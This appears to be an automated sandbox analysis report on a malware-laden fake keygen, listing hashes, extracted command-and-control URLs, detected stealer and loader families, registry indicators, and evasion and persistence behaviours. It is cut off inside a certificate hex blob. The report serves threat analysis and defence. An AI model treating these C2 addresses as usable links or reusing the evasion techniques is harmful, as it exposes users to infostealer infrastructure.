Resubmissions
06/04/2021, 13:50
210406-gc51ndzsc2 1026/03/2021, 23:40
210326-d1ybrjhevx 1013/03/2021, 17:16
210313-8s7b52z63e 1005/03/2021, 14:52
210305-34k3zj54f2 1001/03/2021, 13:17
210301-naamxpgf4e 1028/02/2021, 20:46
210228-6q3b959xae 1028/02/2021, 20:15
210228-mbr268za12 1028/02/2021, 18:32
210228-h944b5cpxa 1028/02/2021, 15:10
210228-hnwwpyjy7j 10Analysis
-
max time kernel
42s -
max time network
301s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
28/02/2021, 18:32
Static task
static1
Behavioral task
behavioral1
Sample
[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe
Resource
win7v20201028
General
-
Target
[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe
-
Size
9.2MB
-
MD5
b806267b5f3b7760df56396b1cf05e6d
-
SHA1
5166d4c1d3e476281d9e991eababc3e4aa9ec5ad
-
SHA256
f95d12a0dbd8199d16f48d8e4cbe69a8d4ec16c534efb36e52a662664e1c1783
-
SHA512
30e393bb3898edc8ab5fb04e62ce421ddf3903075f59e3880408b300f46bb74a85088336d6e1203b2101152cebeef4c1730290b41ca77604ecb722c8f627328b
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://naritouzina.net/
http://nukaraguasleep.net/
http://notfortuaj.net/
http://natuturalistic.net/
http://zaniolofusa.net/
http://4zavr.com/upload/
http://zynds.com/upload/
http://atvua.com/upload/
http://detse.net/upload/
http://dsdett.com/upload/
http://dtabasee.com/upload/
http://yeronogles.monster/upload/
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Extracted
raccoon
9ba64f4b6fe448911470a88f09d6e7d5b92ff0ab
-
url4cnc
https://telete.in/jagressor_kz
Extracted
raccoon
e4d9483b3bf93472877ddcf6765b01165102aed5
-
url4cnc
https://telete.in/s3santodomingo
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
-
Glupteba Payload 6 IoCs
resource yara_rule behavioral2/memory/1008-303-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral2/memory/1008-305-0x0000000003820000-0x000000000407D000-memory.dmp family_glupteba behavioral2/memory/1008-307-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral2/memory/6728-637-0x0000000000400000-0x0000000000C1B000-memory.dmp family_glupteba behavioral2/memory/6728-638-0x00000000036A0000-0x0000000003EA2000-memory.dmp family_glupteba behavioral2/memory/6728-639-0x0000000000400000-0x0000000000C1B000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 8 IoCs
resource yara_rule behavioral2/memory/3244-445-0x0000000000400000-0x0000000000428000-memory.dmp family_redline behavioral2/memory/4552-458-0x0000000000400000-0x0000000000426000-memory.dmp family_redline behavioral2/memory/6356-552-0x0000000003190000-0x00000000031BE000-memory.dmp family_redline behavioral2/memory/6356-555-0x0000000004C70000-0x0000000004C9C000-memory.dmp family_redline behavioral2/memory/6676-795-0x0000000004A20000-0x0000000004A4C000-memory.dmp family_redline behavioral2/memory/6676-799-0x0000000004BE0000-0x0000000004C0B000-memory.dmp family_redline behavioral2/memory/716-883-0x0000000001100000-0x0000000001129000-memory.dmp family_redline behavioral2/memory/716-887-0x00000000015F0000-0x0000000001617000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
DiamondFox payload 2 IoCs
Detects DiamondFox payload in file/memory.
resource yara_rule behavioral2/memory/4748-749-0x0000000002F30000-0x0000000002F63000-memory.dmp diamondfox behavioral2/memory/4748-755-0x0000000000400000-0x0000000000435000-memory.dmp diamondfox -
Nirsoft 6 IoCs
resource yara_rule behavioral2/files/0x0004000000015602-92.dat Nirsoft behavioral2/files/0x0004000000015602-93.dat Nirsoft behavioral2/files/0x000100000001ab9b-121.dat Nirsoft behavioral2/files/0x000100000001ab9b-120.dat Nirsoft behavioral2/files/0x000300000001ab9d-143.dat Nirsoft behavioral2/files/0x000300000001ab9d-141.dat Nirsoft -
Creates new service(s) 1 TTPs
-
Executes dropped EXE 38 IoCs
pid Process 2512 keygen-pr.exe 3252 keygen-step-1.exe 528 keygen-step-3.exe 932 keygen-step-4.exe 4364 key.exe 4348 Setup.exe 4604 26FF190E7AE0F7C7.exe 4236 26FF190E7AE0F7C7.exe 4484 Install.exe 4548 multitimer.exe 2128 file.exe 436 1614537371730.exe 1416 BAE9.tmp.exe 1692 BAE9.tmp.exe 4032 multitimer.exe 660 multitimer.exe 4740 1614537376074.exe 1612 md2_2efs.exe 1016 BTRSetp.exe 4448 1614537381340.exe 1548 tnlv2ed0qpx.exe 1720 vict.exe 4852 0yqqfwgpv4q.exe 672 yejvxlzz0mc.exe 4252 safebits.exe 4380 vpn.exe 1008 app.exe 4684 vict.tmp 4056 setup_10.2_us3.exe 2012 tnlv2ed0qpx.tmp 4404 bcjy5pnxzjx.exe 3140 vpn.tmp 4412 chashepro3.exe 772 setup_10.2_us3.tmp 1188 1947376.21 2112 1604051.17 4772 Setup3310.exe 4308 chashepro3.tmp -
Modifies Windows Firewall 1 TTPs
-
resource yara_rule behavioral2/files/0x000100000001ab5c-30.dat office_xlm_macros -
resource yara_rule behavioral2/files/0x0003000000015637-132.dat upx behavioral2/files/0x0003000000015637-131.dat upx -
Loads dropped DLL 3 IoCs
pid Process 3964 MsiExec.exe 4684 vict.tmp 2012 tnlv2ed0qpx.tmp -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 1828 icacls.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral2/memory/4084-369-0x0000000006AC0000-0x0000000006AE1000-memory.dmp agile_net -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\vud5dwip0m3 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\JKBQP114AI\\multitimer.exe\" 1 3.1614537161.603be1c98aacc" multitimer.exe -
Checks for any installed AV software in registry 1 TTPs 53 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 241 api.2ip.ua 463 ip-api.com 86 ipinfo.io 145 ip-api.com 173 ipinfo.io 240 api.2ip.ua 331 api.2ip.ua 46 api.ipify.org 82 ipinfo.io 194 api.ipify.org -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 Setup.exe File opened for modification \??\PhysicalDrive0 26FF190E7AE0F7C7.exe File opened for modification \??\PhysicalDrive0 26FF190E7AE0F7C7.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 4348 Setup.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4604 set thread context of 4892 4604 26FF190E7AE0F7C7.exe 102 PID 1416 set thread context of 1692 1416 BAE9.tmp.exe 112 PID 4604 set thread context of 4744 4604 26FF190E7AE0F7C7.exe 115 PID 4604 set thread context of 4644 4604 26FF190E7AE0F7C7.exe 122 -
Drops file in Program Files directory 6 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\DTS\DreamTrip.exe setup_10.2_us3.tmp File opened for modification C:\Program Files (x86)\DTS\seed.sfx.exe setup_10.2_us3.tmp File created C:\Program Files (x86)\DTS\unins000.dat setup_10.2_us3.tmp File created C:\Program Files (x86)\DTS\is-GQG73.tmp setup_10.2_us3.tmp File created C:\Program Files (x86)\DTS\is-PHEIK.tmp setup_10.2_us3.tmp File created C:\Program Files (x86)\DTS\is-SF8HG.tmp setup_10.2_us3.tmp -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 22 IoCs
pid pid_target Process procid_target 5660 4404 WerFault.exe 129 5752 4404 WerFault.exe 129 5816 4404 WerFault.exe 129 6052 4404 WerFault.exe 129 5688 4404 WerFault.exe 129 5924 4404 WerFault.exe 129 184 4404 WerFault.exe 129 1292 4404 WerFault.exe 129 216 4404 WerFault.exe 129 364 4404 WerFault.exe 129 5788 4252 WerFault.exe 167 6492 3672 WerFault.exe 345 6652 3672 WerFault.exe 345 1408 3672 WerFault.exe 345 6948 3672 WerFault.exe 345 4040 3672 WerFault.exe 345 6660 3672 WerFault.exe 345 4640 3672 WerFault.exe 345 7516 3672 WerFault.exe 345 8004 3672 WerFault.exe 345 7272 3672 WerFault.exe 345 228 3672 WerFault.exe 345 -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc 26FF190E7AE0F7C7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc 26FF190E7AE0F7C7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName 26FF190E7AE0F7C7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 26FF190E7AE0F7C7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName 26FF190E7AE0F7C7.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 BAE9.tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString BAE9.tmp.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 6596 timeout.exe 5736 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 3 IoCs
pid Process 3004 taskkill.exe 5504 taskkill.exe 6984 TASKKILL.exe -
Modifies data under HKEY_USERS 1 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\PegasPc file.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 file.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d